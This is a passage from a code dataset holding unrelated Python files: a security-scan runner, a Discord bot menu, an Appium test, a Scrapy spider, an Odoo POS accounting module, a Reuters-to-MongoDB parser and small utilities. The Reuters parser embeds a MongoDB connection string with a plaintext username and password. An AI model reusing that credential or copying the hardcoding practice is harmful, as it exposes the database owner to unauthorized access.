stingray_testcase_id, stingray_profile, apk_file))\n\n scan_id = stingray.start_scan()\n\n if not scan_id:\n log.error('Error when starting scan. Exit with error code 1')\n sys.exit(1)\n\n scan_complete = False\n log.info('Scan successfully started. 
Monitor scan status')\n        while not scan_complete:\n            log.info('Get scan status')\n            scan_complete = stingray.get_scan_status(scan_id)\n            if not scan_complete:  # only sleep while the scan is still running\n                time.sleep(30)\n\n        log.info('Scan complete, trying to get scan result')\n        scan_result = stingray.get_scan_result(scan_id)\n        if not scan_result:\n            continue\n\n        log.info('Scan complete, analysing issues')\n        short_stat = stingray.get_short_stat(scan_id)\n        if not short_stat:\n            sys.exit(5)\n        log.info('Vulnerability details: {0}'.format(short_stat))\n\n        for i in scan_result:\n            i['id'] = str(stingray_testcase_id) + '-' + str(i['id'])  # add testcase to id\n            i['scan_id'] = scan_id\n\n        if 'separate' in report_types:\n            stingray.create_report(scan_result, 'separate')\n            log.info('Creating separate report...')\n\n        for i in scan_result:\n            i['id'] = [i['id']]\n            i['scan_id'] = [i['scan_id']]\n\n        results.append(scan_result)\n\n    for type in report_types:\n        if type == 'standard' or type == 'grouping':\n            common_result = join_results(results, type)\n            log.info('Creating {0} report...'.format(type))\n            stingray.create_report(common_result, type)\n\n    if len(results) == 0:\n        log.info('There is no issue data for the report')\n\n    log.info('Job completed successfully')\n","sub_path":"run-stingray-scan.py","file_name":"run-stingray-scan.py","file_ext":"py","file_size_in_byte":23845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"211832218","text":"import asyncio\nimport re\n\nimport discord\n\nimport modules.utility as utility\n\nfrom classes.DictSavable import DictSavable\nfrom classes.InputMenu import InputMenu\nfrom modules import basics, aesthetic\n\narrow_r = \"<:_:541089103551266827>\"\n\nclass Help(InputMenu):\n    def __init__(self,bot,**kwargs):\n        InputMenu.__init__(self,bot,**kwargs)\n        # Setup\n        defaults = {\n            \"show\": \"\"\n        }\n        DictSavable.__init__(self, defaults, kwargs, exclude=[\"validfor\"])\n\n    async def getlayout(self,index,*,final=False):\n        return await basics.help(self.context, self.show, False)\n\n    async def start(self):\n        await InputMenu.start(self)\n        for x in range(1,17):\n            await self.messages[0].add_reaction(self.bot.buttons[str(x)])\n            self.adddict[self.bot.buttons[str(x)].id] = self.numberbutton\n\n    async def input(self, m, s):\n        self.show = s\n        await self.updatemessage(0)\n\n    async def reactionadded(self,payload):\n        if payload.message_id == self.foreignmessages[0].id:\n            await self.addreaction(payload.emoji, payload.user_id)\n            await self.updatemessage(0)\n\n    async def numberbutton(self,payload):\n        print(\"heh\")","sub_path":"rewrite/classes/Help.py","file_name":"Help.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"563729634","text":"import os\nimport unittest\nfrom appium import webdriver\nfrom time import sleep\n\n# Test of the device's built-in calculator app\n# Returns abs path relative to this file and not cwd\nlambda p: os.path.abspath(\n    os.path.join(os.path.dirname(__file__), p)\n)\n\nclass AndroidTests(unittest.TestCase):\n\n    def setUp(self):\n        desired_caps = {}\n        desired_caps['platformName'] = 'Android'\n        desired_caps['platformVersion'] = '8.0'\n        desired_caps['deviceName'] = 'c3d59ab1'\n        desired_caps['appPackage'] = 'com.sec.android.app.popupcalculator'\n        desired_caps['appActivity'] = '.Calculator'\n\n        self.driver = webdriver.Remote('http://127.0.0.1:4723/wd/hub', desired_caps)\n\n    def tearDown(self):\n        self.driver.quit()\n\n    def test_calculator(self):\n        el = self.driver.find_element_by_id(\"bt_08\").click()\n        el = 
self.driver.find_element_by_id(\"bt_add\").click()\n el = self.driver.find_element_by_id(\"bt_07\").click()\n el = self.driver.find_element_by_id(\"bt_backspace\").click()\n sleep(2)\n el = self.driver.find_element_by_id(\"bt_05\").click()\n el = self.driver.find_element_by_id(\"bt_equal\").click()\n screenshotBase64 = self.driver.get_screenshot_as_base64()\n sleep(2)\n el = self.driver.find_element_by_id(\"bt_clear\").click()\n sleep(2)\n\n\nif __name__ == '__main__':\n suite = unittest.TestLoader().loadTestsFromTestCase(AndroidTests)\n unittest.TextTestRunner(verbosity=2).run(suite)\n","sub_path":"lianxi/Calculatortest.py","file_name":"Calculatortest.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"280563155","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy.selector import Selector\nimport json\nimport ast\nfrom ...items.fang.xzlshou import FangXzlShouItem\n\nclass FangXzlShouSpider(scrapy.Spider):\n name = 'FangXzlShouSpider'\n allowed_domains = ['fang.com']\n start_urls = ['https://ditu.fang.com/?c=channel&a=ajaxXiaoquMapSearch&x1=116.47361755371094&y1=39.964210510253906&distance=2&strNewCode=1010082663&esf=1']\n db_name = 'fang'\n collection_name = 'xzlshou'\n\n def parse(self, response):\n res_json = json.loads(response.body)\n\n zhuzhai = res_json[\"住宅\"]\n xiezilou = res_json[\"写字楼\"]\n\n\n building_types = [zhuzhai, xiezilou]\n url_queue = []\n\n for building_type in building_types:\n for building in building_type:\n projcode = building[\"projcode\"]\n coordx = building[\"coordx\"]\n coordy = building[\"coordy\"]\n city = building[\"city\"].encode(\"unicode-escape\").decode(\"utf-8\").replace(\"\\\\\", \"%\")\n district = building[\"district\"].encode(\"unicode-escape\").decode(\"utf-8\").replace(\"\\\\\", \"%\")\n\n url_queue.append((projcode, coordx, coordy))\n\n item = FangXzlShouItem()\n item[\"info\"] = building\n\n yield item\n\n new_url = 'https://ditu.fang.com/?c=channel&a=ajaxXiaoquMapSearch&x1={} \\\n &y1={}&distance=2&strNewCode={}&esf=1'.format(url_queue[0][1], url_queue[0][2], url_queue[0][0])\n del url_queue[0]\n\n yield scrapy.Request(url=new_url,\n callback=self.parse \n )\n","sub_path":"deecamp_scraper/spiders/fang/FangXzlShou.py","file_name":"FangXzlShou.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"651655238","text":"# -*- coding: utf-8 -*-\n# Part of Odoo. 
See LICENSE file for full copyright and licensing details.\nfrom addons.point_of_sale.models.pos_session import PosSession\nfrom odoo import api, fields, models, tools, _\nfrom odoo.addons import decimal_precision as dp\nfrom odoo.exceptions import UserError, ValidationError\nimport datetime\nimport time\n\n\nclass KGPOSSession(models.Model):\n    _inherit = 'pos.session'\n\n    # Working_date odoo == working_date PMS\n    # start_at is stored in the database as DateTime UTC (GMT+00) in a postgres DateTime Without Timezone field\n    # if a Room Service cashier session opens/starts on Feb 10 at 1 AM WIB,\n    # it will be stored in the database as 2019-02-09T18:00:00 == GMT+00\n    # this becomes a problem when extracting data to analytics/BI,\n    # which is why this field is needed; it will be filled = Date Start at = 2019-02-10\n    # IMPORTANT: make sure the timezone setting on the user master record is set to Asia/Jakarta,\n    # Asia/Makasar or Asia/Jayapura\n    working_date = fields.Date(\n        string='Working Date',\n        required=True, states={'closed': [('readonly', True)]},\n        index=True, copy=False, default=fields.Date.context_today,\n        help=\"Active Working Date\")\n\n    # name_shift = fields.Char('Session')\n    shift_id = fields.Many2one('hr.shift', string='Shift')\n    name = fields.Char(string='Session ID', required=True, default='/')\n\n    # @api.onchange('shift_id')\n    # def _onchange_shift(self):\n    #     orig_name = self._origin.name.replace('/' + self._origin.shift_id.code, \"\")\n    #\n    #     self.name = orig_name + '/' + self.shift_id.code\n    #\n    #     return self\n\n    # code when we want to show pop up to select journal for applying advance payment\n    # @api.multi\n    # def action_pos_session_closing_control(self):\n    #     self._check_pos_session_balance()\n    #     for session in self:\n    #         session.write({'state': 'closing_control', 'stop_at': fields.Datetime.now()})\n    #         if not session.config_id.cash_control:\n    #             if any(order.pos_advance_payment_ids for order in session.order_ids):\n    #                 view_id = self.env.ref('kg_pos.wizard_adv_payment_journal_view')\n    #                 return {\n    #                     'domain': \"[]\",\n    #                     'name': _('Select journal for applying advance payment'),\n    #                     'view_type': 'form',\n    #                     'view_mode': 'form',\n    #                     'res_model': 'wizard.select.journal',\n    #                     'view_id': view_id.id,\n    #                     'target': 'new',\n    #                     'type': 'ir.actions.act_window'\n    #                 }\n    #             else:\n    #                 session.action_pos_session_close()\n    # end of code\n\n    # code when we want to show pop up to select journal for applying advance payment\n    # @api.multi\n    # def action_pos_session_validate(self):\n    #     self._check_pos_session_balance()\n\n    # # custom code\n    # for session in self:\n    #     if any(order.pos_advance_payment_ids for order in session.order_ids):\n    #         view_id = self.env.ref('kg_pos.wizard_adv_payment_journal_view')\n\n    #         return {\n    #             'domain': \"[]\",\n    #             'name': _('Select journal for applying advance payment'),\n    #             'view_type': 'form',\n    #             'view_mode': 'form',\n    #             'res_model': 'wizard.select.journal',\n    #             'view_id': view_id.id,\n    #             'target': 'new',\n    #             'type': 'ir.actions.act_window'\n    #         }\n    #     else:\n    #         session.action_pos_session_close()\n    # end of custom code\n\n    # original code\n    # self._check_pos_session_balance()\n    # self.action_pos_session_close()\n    # end of original code\n\n    # end of code\n\n    @api.model\n    def create(self, values):\n        res = super(KGPOSSession, self).create(values)\n        for statement in res.statement_ids:\n            statement.date = res.working_date\n        return res\n\n    @api.multi\n    def write(self, values):\n        res = super(KGPOSSession, self).write(values)\n        if values.get('working_date'):\n            for rec in self:\n                for statement in 
rec.statement_ids:\n if statement.date != values.get('working_date'):\n statement.date = values.get('working_date')\n return res\n\n def _confirm_orders(self):\n for session in self:\n company = session.config_id.journal_id.company_id\n company_id = company.id\n orders = session.order_ids.filtered(lambda order: order.state == 'paid').sorted(key=lambda order: order.id)\n\n # custom code by andi\n for order in orders:\n\n if order.pos_advance_payment_ids:\n if order.apply_id:\n # refund process\n order.post_refund_order_advance_payment()\n else:\n self.post_order_with_advance_payment(order)\n\n elif order.customer_id:\n if order.apply_id:\n # refund process\n order.post_refund_order_city_ledger()\n else:\n self.post_order_cust_city_ledger(order, session)\n\n # end of custom code\n\n super(KGPOSSession, self)._confirm_orders()\n\n # journal_id = self.env['ir.config_parameter'].sudo().get_param(\n # 'pos.closing.journal_id_%s' % company_id, default=session.config_id.journal_id.id)\n # if not journal_id:\n # raise UserError(_(\"You have to set a Sale Journal for the POS:%s\") % (session.config_id.name,))\n #\n # move = self.env['pos.order'].with_context(force_company=company_id)._create_account_move(\n # session.start_at, session.name, int(journal_id), company_id)\n # orders.with_context(force_company=company_id)._create_account_move_line(session, move)\n # for order in session.order_ids.filtered(lambda o: o.state not in ['done', 'invoiced']):\n # if order.state not in ('paid'):\n # raise UserError(\n # _(\"You cannot confirm all orders of this session, because they have not the 'paid' status.\\n\"\n # \"{reference} is in state {state}, total amount: {total}, paid: {paid}\").format(\n # reference=order.pos_reference or order.name,\n # state=order.state,\n # total=order.amount_total,\n # paid=order.amount_paid,\n # ))\n # order.action_pos_order_done()\n # orders_to_reconcile = session.order_ids._filtered_for_reconciliation()\n # orders_to_reconcile.sudo()._reconcile_payments()\n\n def post_order_cust_city_ledger(self, order, session):\n # TODO: refactor code, extract method to create invoice, use statement_line.create_invoice_from_pos_payment\n # new code: (belum sempat test, buka code ini, tutup yg old code, kemudian lakukan test)\n # statement_payment = None\n # statement_payment_amount_used = 0\n # partner = order.customer_id\n # if not partner:\n # return False\n #\n # for st_line in order.statement_ids:\n # if st_line.journal_id.is_city_ledger:\n # statement_payment = st_line\n # statement_payment_amount_used += st_line.amount\n # invoice_journal = st_line.journal_id\n # account_id_invoice_line = invoice_journal.default_credit_account_id.id\n # if statement_payment and statement_payment_amount_used > 0:\n # statement_payment.create_invoice_from_pos_payment(\n # order, partner, invoice_journal, account_id_invoice_line,\n # statement_payment_amount_used)\n\n # old custom code:\n invoice = self.env['account.invoice']\n if order.customer_id.property_account_receivable_id.id:\n account_id = order.customer_id.property_account_receivable_id.id\n else:\n raise UserError(\n _('There is no receivable account defined for city ledger customer \"%s\"') %\n (order.customer_id.name,))\n if any(st_line.journal_id.is_city_ledger for st_line in order.statement_ids):\n city_ledger_journal = order.statement_ids.filtered(lambda st: st.journal_id.is_city_ledger)[\n 0].journal_id\n related_journal = city_ledger_journal\n journal_id = city_ledger_journal.id\n else:\n related_journal = order.sale_journal\n 
journal_id = order.sale_journal.id\n # TODO: for RETURN transaction, create credit note and auto reconcile with the original invoice\n values = {\n 'date_invoice': session.working_date,\n 'partner_id': order.customer_id.id,\n 'currency_id': order.pricelist_id.currency_id.id,\n 'account_id': account_id,\n 'user_id': order.user_id.id,\n 'journal_id': journal_id,\n 'company_id': order.company_id.id,\n 'origin': order.name,\n 'invoice_line_ids': [],\n 'app_source': 'pos'\n }\n city_ledger_statement = order.statement_ids.filtered(lambda st: st.journal_id.is_city_ledger)\n city_ledger_amount_used = sum(cl_statement.amount for cl_statement in city_ledger_statement)\n vals = {\n 'name': order.name,\n # 'product_id': line.product_id.id,\n 'account_id': related_journal.default_credit_account_id.id,\n # 'account_id': order.customer_id.expense_account_id.id,\n 'quantity': 1,\n 'price_unit': city_ledger_amount_used or 0,\n # 'invoice_line_tax_ids': [(6, 0, line.tax_ids.mapped('id'))] or False,\n }\n values['invoice_line_ids'].append((0, 0, vals))\n curr_invoice = invoice.create(values)\n order.invoice_id = curr_invoice\n # validate invoice\n curr_invoice.action_invoice_open()\n\n def post_order_with_advance_payment(self, order):\n invoice = self.env['account.invoice']\n if order.partner_id.property_account_receivable_id.id:\n account_id = order.partner_id.property_account_receivable_id.id\n else:\n raise UserError(\n _('There is no receivable account defined for customer \"%s\"') %\n (order.partner_id.name,))\n if any(journal.is_advance_payment for journal in order.statement_ids.mapped('journal_id')):\n\n journal = order.statement_ids.filtered(lambda st: (\n st.journal_id.is_advance_payment == True\n )).mapped('journal_id')[-1]\n\n journal_id = journal.id\n\n else:\n journal_id = order.sale_journal.id\n values = {\n 'partner_id': order.partner_id.id,\n 'currency_id': order.pricelist_id.currency_id.id,\n 'account_id': account_id,\n 'user_id': order.user_id.id,\n 'journal_id': journal_id,\n 'company_id': order.company_id.id,\n 'origin': order.name,\n 'invoice_line_ids': [],\n 'app_source': 'pos'\n }\n for payment in order.pos_advance_payment_ids:\n vals = {\n 'name': payment.name,\n 'account_id': payment.advance_payment_account_id.id,\n 'quantity': 1,\n 'price_unit': payment.adv_payment_amount_used,\n }\n values['invoice_line_ids'].append((0, 0, vals))\n curr_invoice = invoice.create(values)\n order.invoice_id = curr_invoice\n # validate invoice\n curr_invoice.action_invoice_open()\n account_adv_payment_inv = self.env['account.advance.payment.invoice']\n real_adv_payment_id = order.pos_advance_payment_ids.mapped('adv_payment_id')\n real_adv_payment = self.env['account.payment'].browse(real_adv_payment_id)\n # code to apply journal from pop up wizard when validatin POS session\n # if self.env.context.get('adv_payment_journal', False):\n # journal = self.env.context.get('adv_payment_journal', False)\n # else:\n # journal = curr_invoice.journal_id\n # end of code\n journal = curr_invoice.journal_id\n order.invoice_id = curr_invoice\n value = {\n 'journal_id': journal.id,\n 'date': fields.date.today(),\n 'advance_payment_ids': [(6, 0, real_adv_payment.ids)]\n }\n account_adv_payment_inv = account_adv_payment_inv.with_context(\n active_model=curr_invoice._name,\n active_ids=curr_invoice.mapped('id'),\n active_id=curr_invoice.id).create(\n value)\n account_adv_payment_inv.apply_advance_payment()\n # code for sending data to PMS\n post_request = self.env['pos.helpers']\n 
post_request.post_adv_payment(advance_payments=account_adv_payment_inv.advance_payment_ids)\n # end of code\n\n @api.multi\n def action_pos_session_close(self):\n # Close CashBox\n for session in self:\n # custom code, get date from working date field\n # start_date = datetime.datetime.strptime(session.start_at, \"%Y-%m-%d %H:%M:%S\").date()\n start_date = fields.Date.from_string(session.working_date)\n # end of custom code\n\n company_id = session.config_id.company_id.id\n ctx = dict(self.env.context, force_company=company_id, company_id=company_id)\n for st in session.statement_ids:\n # custom code\n st.date = session.working_date\n order_with_same_journal_id = session.order_ids.filtered(\n lambda order:\n (\n st.journal_id.id in order.statement_ids.mapped('journal_id').mapped('id')\n )\n )\n # end of custom code\n\n if abs(st.difference) > st.journal_id.amount_authorized_diff:\n # The pos manager can close statements with maximums.\n if not self.user_has_groups(\"point_of_sale.group_pos_manager\"):\n raise UserError(_(\n \"Your ending balance is too different from the theoretical cash closing (%.2f), \"\n \"the maximum allowed is: %.2f. You can contact your manager to force it.\") % (\n st.difference, st.journal_id.amount_authorized_diff))\n if st.journal_id.type not in ['bank', 'cash']:\n raise UserError(_(\"The type of the journal for your payment method should be bank or cash \"))\n\n # custom code mario ardi\n if st.journal_id.is_officer_check or st.journal_id.is_department_expense:\n st.with_context(ctx, order_with_same_journal_id=order_with_same_journal_id,\n start_date=start_date).sudo().button_confirm_bank_kg_dept_officer()\n self.create_additional_journal(st, order_with_same_journal_id)\n else:\n st.with_context(ctx, order_with_same_journal_id=order_with_same_journal_id,\n start_date=start_date).sudo().button_confirm_bank()\n # end of custom code mario ardi\n\n self.with_context(ctx, start_date=start_date)._confirm_orders()\n self.write({'state': 'closed'})\n return {\n 'type': 'ir.actions.client',\n 'name': 'Point of Sale Menu',\n 'tag': 'reload',\n 'params': {'menu_id': self.env.ref('point_of_sale.menu_point_root').id},\n }\n\n @api.multi\n def create_additional_journal(self, st, order_ids):\n data = []\n for order in order_ids:\n\n # move_id = order.account_move.id\n\n for line in order.lines:\n income_account = False\n if line.product_id.property_account_income_id.id:\n income_account = line.product_id.property_account_income_id.id\n elif line.product_id.categ_id.property_account_income_categ_id.id:\n income_account = line.product_id.categ_id.property_account_income_categ_id.id\n\n if not income_account:\n raise UserError(\n _('There is no Income Account defined for this product: \"%s\" -- product category: \"%s\"') %\n (line.product_id.name, line.product_id.categ_id.name))\n expense_account = False\n if line.product_id.property_account_expense_id.id:\n expense_account = line.product_id.property_account_expense_id.id\n elif line.product_id.categ_id.property_account_expense_categ_id.id:\n expense_account = line.product_id.categ_id.property_account_expense_categ_id.id\n\n if not expense_account:\n raise UserError(\n _('There is no Expense Account defined for this product: \"%s\" -- product category: \"%s\"') %\n (line.product_id.name, line.product_id.categ_id.name))\n\n # misc_journal_id = self.env['account.journal'].search([\n # ('company_id.id','=',order.company_id.id),\n # ('type','=','general'),\n # ],limit=1)\n\n # if not misc_journal_id:\n # raise UserError(\n # 
_('There is no Miscellaneous journal defined for this company \"%s\"') %\n # (order.company_id.name,))\n\n cost_price = line.qty * line.product_id.standard_price\n\n # debit_line = order.account_move.line_ids.with_context(\n # check_move_validity=False).create({\n # # 'move_id': move_id,\n # 'name': order.name + ' : ' + line.product_id.name,\n # 'journal_id': st.journal_id.id,\n # # 'journal_id' : misc_journal_id.id,\n # 'date': self.working_date,\n # 'account_id': income_account,\n # 'debit': cost_price,\n # 'credit': 0,\n # # 'statement_id': st.id,\n # # 'statement_line_id': order.statement_ids[0].id,\n # # 'payment_id': order.statement_ids[0].journal_entry_ids[0].payment_id.id,\n # })\n\n debit_line_vals = (0, 0, {\n 'name': order.name + ' : ' + line.product_id.name,\n 'journal_id': st.journal_id.id,\n # 'journal_id' : misc_journal_id.id,\n 'date': self.working_date,\n 'account_id': income_account,\n 'debit': cost_price,\n 'credit': 0,\n 'statement_id': st.id,\n 'statement_line_id': order.statement_ids[0].id,\n 'payment_id': order.statement_ids[0].journal_entry_ids[0].payment_id.id,\n })\n data.append(debit_line_vals)\n\n credit_line_vals = (0, 0, {\n 'name': order.name + ' : ' + line.product_id.name,\n 'journal_id': st.journal_id.id,\n # 'journal_id' : misc_journal_id.id,\n 'date': self.working_date,\n 'account_id': expense_account,\n 'debit': 0,\n 'credit': cost_price,\n 'statement_id': st.id,\n 'statement_line_id': order.statement_ids[0].id,\n 'payment_id': order.statement_ids[0].journal_entry_ids[0].payment_id.id,\n })\n data.append(credit_line_vals)\n\n move_id = self.env['account.move'].create({\n 'ref': self.name + ' - Additional - Internal Transaction',\n 'journal_id': st.journal_id.id,\n 'date': self.working_date,\n 'narration': 'Journal Tambahan - transaksi internal - POS - officer check/dept expense',\n 'line_ids': data\n })\n move_id.post()\n\n\n","sub_path":"local/kg_pos/models/pos_session.py","file_name":"pos_session.py","file_ext":"py","file_size_in_byte":20651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"59091734","text":"import flask, flask.views\nimport os\nimport utils\nfrom app import app, db\nfrom flask import Flask, jsonify, render_template, request\nfrom models import Task, User\n\nclass History(flask.views.MethodView):\n\t@utils.login_required\n\tdef get(self):\n\t\treturn flask.render_template('history.html')\n\n\t@utils.login_required\n\tdef post(self):\n\t\treturn flask.redirect(flask.url_for('history'))\n\n\t@app.route('/echo/', methods=['GET'])\n\tdef echo():\n\t\tusername = flask.session.get('username')\n\t\tuser = User.query.filter_by(username = username).first()\n\t\tuser_id = user.id\n\n\t\thistory = Task.query.filter_by(user_id = user_id).all()\n\t\thistory_dict = [dict(id=row.id,\n\t\t\tscene=row.scene,\n\t\t\tstate=row.state,\n\t\t\tprogress=row.progress,\n\t\t\tadd_date=row.add_date,\n\t\t\tstart_date=row.start_date,\n\t\t\tfinish_date=row.finish_date,\n\t\t\trendered_scene=row.rendered_scene) for row in history]\n\t\t#ret_data = {\"value\": ppp.id, \"id\": ppp.scene}\n\t\treturn jsonify(data_val = history_dict)","sub_path":"aplikacja_flask/history.py","file_name":"history.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"268727070","text":"import re\nimport pymongo\n\n#Database connectivity and file details\nmyclient = 
pymongo.MongoClient('mongodb+srv://jeyanth:7HPAE8apzyvPmxdV@cluster0.smhz3.mongodb.net/test?authSource=admin&replicaSet=atlas-7myp9l-shard-0&readPreference=primary&appname=MongoDB%20Compass&ssl=true')\ndatabase = myclient['ReuterDb']\ncollection = database['processeddata']\nfilename = ['reut2-009.sgm','reut2-014.sgm']\nspcl_char_regex=re.compile('[@_!#$%^&*\\\\n();,.\\'<>?/\\|}{~:]')\n\n# Accessing the files\nfor file in filename:\n    with open(file,'r') as fh:\n        newcollection = []\n        filedata = fh.read()\n        reg_str = \"<REUTERS[^>]*>\\s*((?:.|\\n)*?)</REUTERS>\"\n        res = re.findall(reg_str, filedata)\n        print('Processing of Data, start for the file '+file)\n        # Individual news items are obtained and processed below\n        for line in res:\n            reuter = {}\n            title = ''\n            try:\n                place = re.findall('<PLACES[^>]*>([^<]+)</PLACES>', line)[0]\n            except:\n                place = ''\n            try:\n                date = re.findall('<DATE[^>]*>([^<]+)</DATE>', line)[0]\n            except:\n                date = ''\n            try:\n                people = re.findall('<PEOPLE[^>]*>([^<]+)</PEOPLE>', line)[0]\n            except:\n                people = ''\n            try:\n                companies = re.findall('<COMPANIES[^>]*>([^<]+)</COMPANIES>', line)[0]\n            except:\n                companies = ''\n            try:\n                orgs = re.findall('<ORGS[^>]*>([^<]+)</ORGS>', line)[0]\n            except:\n                orgs = ''\n            try:\n                topics = re.findall('<TOPICS[^>]*>([^<]+)</TOPICS>', line)[0]\n            except:\n                topics = ''\n            # The TEXT tag contains the title and data\n            texttags = re.findall(\"<TEXT[^>]*>([\\s\\S]+[^<]*?)</TEXT>\", line)\n            for texttag in texttags:\n                titleText = re.findall(\"<TITLE[^>]*>([^<]+)</TITLE>\", texttag)\n                for titleOne in titleText:\n                    title = titleOne\n                result = re.sub('<TITLE[^>]*>([^<]+)</TITLE>', '', texttag)\n                body = re.sub('<.*?>', '', result)\n                body = re.sub(spcl_char_regex,'',body)\n            reuter[\"title\"] = title\n            reuter[\"place\"] = place\n            reuter[\"date\"] = date\n            reuter[\"topics\"] = topics\n            reuter[\"people\"] = people\n            reuter[\"orgs\"] = orgs\n            reuter[\"companies\"] = companies\n            reuter[\"data\"] = body\n            newcollection.append(reuter)\n        print('Data of the file '+file+' is saved to DB')\n        collection.insert_many(newcollection)","sub_path":"5408-assignment-2-Assignment-3-BigData/NewsFileReader.py","file_name":"NewsFileReader.py","file_ext":"py","file_size_in_byte":2885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"499487820","text":"class Solution:\n    def findShortestSubArray(self, nums):\n        \"\"\"\n        :type nums: List[int]\n        :rtype: int\n        \"\"\"\n        dict1 = {i:0 for i in nums}\n        dict2 = {i:[] for i in nums}\n        l = len(nums)\n        deg = 0\n        for i in range(l):\n            dict1[nums[i]] += 1\n            deg = max(deg,dict1[nums[i]])\n            dict2[nums[i]].append(i)\n\n        m = l\n        for key in dict1:\n            if dict1[key] == deg:\n                m = min(m,dict2[key][-1] - dict2[key][0] + 1)\n\n        return m\n","sub_path":"degree0fAnArray.py","file_name":"degree0fAnArray.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"437619001","text":"from .base import *\n\nenv = environ.Env()\n\nALLOWED_HOSTS = env.list('ALLOWED_HOSTS')\n\nSECRET_KEY = env.str('SECRET_KEY')\n\nDATABASES = {\n    'default': env.db()\n}\n\nREST_FRAMEWORK = {\n    **REST_FRAMEWORK,\n    'DEFAULT_RENDERER_CLASSES': (\n        'djangorestframework_camel_case.render.CamelCaseJSONRenderer',\n    )\n}\n","sub_path":"backend/config/settings/production.py","file_name":"production.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"454416349","text":"\"\"\"Test the covtype loader.\n\nSkipped if covtype is not already downloaded to data_home.\n\"\"\"\n\nimport errno\nfrom sklearn.datasets import 
fetch_covtype\nfrom sklearn.utils.testing import assert_equal, SkipTest\n\n\ndef fetch(*args, **kwargs):\n    return fetch_covtype(*args, download_if_missing=False, **kwargs)\n\n\ndef test_fetch():\n    try:\n        data1 = fetch(shuffle=True, random_state=42)\n    except IOError as e:\n        if e.errno == errno.ENOENT:\n            raise SkipTest(\"Covertype dataset can not be loaded.\")\n\n    data2 = fetch(shuffle=True, random_state=37)\n\n    X1, X2 = data1['data'], data2['data']\n    assert_equal((581012, 54), X1.shape)\n    assert_equal(X1.shape, X2.shape)\n\n    assert_equal(X1.sum(), X2.sum())\n\n    y1, y2 = data1['target'], data2['target']\n    assert_equal((X1.shape[0],), y1.shape)\n    assert_equal((X1.shape[0],), y2.shape)\n","sub_path":"Sklearn_scipy_numpy/source/sklearn/datasets/tests/test_covtype.py","file_name":"test_covtype.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"176299476","text":"import logging\nfrom logging.handlers import TimedRotatingFileHandler\n# https://www.cnblogs.com/du-jun/p/10556985.html\ndef getLogger(path='log'):\n    debug = True\n    # Log output format\n    # %(levelno)s: numeric value of the log level\n    # %(levelname)s: name of the log level\n    # %(pathname)s: path of the currently running program, i.e. sys.argv[0]\n    # %(filename)s: name of the currently running program\n    # %(funcName)s: function that emitted the log\n    # %(lineno)d: line number that emitted the log\n    # %(asctime)s: time of the log\n    # %(thread)d: thread ID\n    # %(threadName)s: thread name\n    # %(process)d: process ID\n    # %(message)s: log message\n    log_format = '%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s'\n    if debug:  # in debug mode, also print to the screen\n        logging.basicConfig(level=logging.DEBUG,\n                            format=log_format)\n\n    logger = logging.getLogger()\n    logger.setLevel(logging.DEBUG)\n\n    # (log rotation, expired files deleted) one file per day\n    # create a TimedRotatingFileHandler object\n    # interval: rotation period, unit given by 'when'; e.g. when='D', interval=1 means one log file per day\n    # when=M: one log file per minute\n    # backupCount: number of log files to keep\n    log_file_handler = TimedRotatingFileHandler(filename=path + \"/log\", when=\"D\", interval=1, backupCount=2)\n\n    log_file_handler.setLevel(logging.DEBUG)  # log-level threshold for file output\n    log_file_handler.setFormatter(logging.Formatter(log_format))\n    logger.addHandler(log_file_handler)\n\n    return logger\n","sub_path":"util/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"509513956","text":"import numpy as np\nimport time\nimport h5py\nimport matplotlib.pyplot as plt\n\n## Setting Boundary conditions for each split electrode with unique central hole sizes\n\ndelta = 100e-6 ## 100 micrometer precision\nlarge_sep = 50.4e-3\nsmall_sep = 12.4e-3\nlenX = 120e-3 # range we are looking at (120 mm)\nrange_x = np.arange(0, lenX, delta)\nsep = np.arange(small_sep, large_sep, delta*10)\nrange_z_largest = np.arange(-sep[-1]/2, sep[-1]/2, delta)\nU = np.empty((len(range_z_largest), len(range_x), len(sep)))\n\n\nstart = time.time()\n\n\nfor k in np.arange(0,len(sep)):\n\n    lenZ = sep[k] ## the distance between your plates\n\n    range_z = np.arange(-lenZ/2, lenZ/2, delta)\n\n    hole_radii = 1.5e-3\n\n    fopt = 2 - (2*np.pi)/float(len(range_z))\n\n    #BCs\n    #Ttop = 50 ## insert gaussian beam profile for IFO beam heating (right now it is just a delta function BC)\n    V_o = 25.0 ## Voltage applied to plates\n    Utop = V_o\n    Ubottom = -1.0*V_o\n    Uleft = 0\n    Uright = 0\n\n    # Initial guess of what the interior potential will be\n    Uguess = 0\n\n    #Set meshgrid\n    X, Z = np.meshgrid(range_x, range_z)\n\n    ## Hole size is a fraction of the range you are looking 
